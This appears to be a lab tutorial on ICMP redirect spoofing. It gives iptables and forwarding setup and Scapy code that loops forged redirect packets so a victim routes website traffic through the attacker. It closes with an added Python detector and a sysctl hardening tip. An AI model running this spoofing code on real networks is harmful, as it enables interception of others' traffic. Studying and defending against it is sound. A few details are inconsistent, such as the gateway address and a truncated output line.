ICMP-Redirect Attack

Enable IP forwarding and source NAT for the victim subnet:

#sudo echo 1 > /proc/sys/net/ipv4/ip_forward
#sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT   # only needed for forwarded traffic
#sudo iptables -t nat -L
  • ip – gateway = 10.100.31.1
  • ip – victim = 10.100.13.126
  • ip – attacker = 10.100.13.20
  • ip – victim website = 10.23.56.100

Use Scapy to create an ICMP Redirect packet (type=5) that advertises a better gateway for destination 10.23.56.100:

>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
<bound method IP.display of <IP  src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
bound method ICMP.display of >
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
<bound method IP.display of <IP  src=10.100.13.126 dst=10.23.56.100 |>>


# Creating and sending ICMP redirect packets

originalRouterIP='10.100.13.1'
attackerIP='10.100.13.20'
victimIP='10.100.13.126'
serverIP='10.23.56.100'

# We create an ICMP Redirect packet

ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victim IP

redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP

fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

while True:send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>
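
Seen from the defending side, a redirect shaped like the one above can be recognised on the wire by its ICMP type and by the gateway it advertises. The following is an added example, not part of the original page: it uses only the Python standard library, the KNOWN_ROUTERS allow-list and the function names are assumptions, and the sample packet is constructed from the addresses used on this page.

```python
import socket
import struct

# Assumption: routers allowed to act as gateways on the monitored subnet.
KNOWN_ROUTERS = {"10.100.13.1"}

def ipv4_header(src, dst, proto, payload_len):
    """Build a minimal 20-byte IPv4 header (checksum left at 0; sample data only)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                       proto, 0, socket.inet_aton(src), socket.inet_aton(dst))

def parse_redirect(packet):
    """Return a dict for an ICMP redirect (type 5), or None for anything else."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or packet[9] != 1 or len(packet) < ihl + 8:  # protocol 1 = ICMP
        return None
    icmp_type, code, _csum, gw = struct.unpack("!BBH4s", packet[ihl:ihl + 8])
    if icmp_type != 5:
        return None
    info = {"sender": socket.inet_ntoa(packet[12:16]),
            "target": socket.inet_ntoa(packet[16:20]),
            "code": code, "gateway": socket.inet_ntoa(gw),
            "orig_src": None, "orig_dst": None}
    inner = packet[ihl + 8:]  # embedded header of the datagram being "redirected"
    if len(inner) >= 20:
        info["orig_src"] = socket.inet_ntoa(inner[12:16])
        info["orig_dst"] = socket.inet_ntoa(inner[16:20])
    return info

def findings(info, known_routers=KNOWN_ROUTERS):
    """List the reasons a parsed redirect looks suspicious (empty list = none)."""
    reasons = []
    if info["gateway"] not in known_routers:
        reasons.append("gateway %s is not a known router" % info["gateway"])
    if info["orig_src"] is not None and info["orig_src"] != info["target"]:
        reasons.append("embedded source does not match the redirected host")
    if info["orig_src"] is None:
        reasons.append("no embedded original datagram")
    return reasons

# Constructed sample: a redirect with the fields used on this page.
_inner = ipv4_header("10.100.13.126", "10.23.56.100", 6, 8) + struct.pack("!HHI", 55555, 80, 444444444)
_icmp = struct.pack("!BBH4s", 5, 1, 0, socket.inet_aton("10.100.13.20")) + _inner
SAMPLE = ipv4_header("10.100.13.1", "10.100.13.126", 1, len(_icmp)) + _icmp

if __name__ == "__main__":
    print(findings(parse_redirect(SAMPLE)))
```

On Linux hosts that never need redirects, setting net.ipv4.conf.all.accept_redirects and the per-interface accept_redirects sysctls to 0 makes the kernel ignore these messages.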